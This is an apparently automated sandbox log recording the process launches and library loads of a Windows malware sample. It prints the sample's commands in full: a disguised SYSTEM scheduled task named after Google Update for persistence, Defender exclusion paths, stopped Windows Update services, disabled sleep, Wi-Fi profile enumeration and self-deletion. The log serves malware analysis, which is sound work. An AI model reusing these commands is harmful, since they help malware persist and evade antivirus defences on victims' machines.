          Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#irktvxcx#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
          Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Google\Chrome\updater.exe "C:\Program Files\Google\Chrome\updater.exe"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3
          Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop wuauserv
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop bits
          Source: C:\Users\user\Desktop\zufmUwylvo.exeProcess created: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe "C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe" Jump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /C chcp 65001 && netsh wlan show profiles | findstr AllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -ForceJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvcJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#irktvxcx#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe"Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profilesJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr AllJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvcJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvcJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop wuauservJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop bitsJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop dosvcJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0Jump to behavior
          Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Google\Chrome\updater.exe "C:\Program Files\Google\Chrome\updater.exe"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3
          Source: C:\Program Files\Google\Chrome\updater.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
          Source: C:\Program Files\Google\Chrome\updater.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
          Source: C:\Program Files\Google\Chrome\updater.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\updater.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\updater.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\updater.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\updater.exeProcess created: unknown unknown
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop wuauserv
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop bits
          Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\zufmUwylvo.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeSection loaded: edgegdi.dllJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeSection loaded: slc.dllJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeSection loaded: dwrite.dllJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeSection loaded: windowscodecs.dllJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeSection loaded: napinsp.dllJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeSection loaded: pnrpnsp.dllJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeSection loaded: wshbth.dllJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeSection loaded: nlaapi.dllJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeSection loaded: winrnr.dllJump to behavior
          Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
          Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: edgegdi.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: onex.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\findstr.exeSection loaded: edgegdi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\dialer.exeSection loaded: edgegdi.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: ntmarta.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
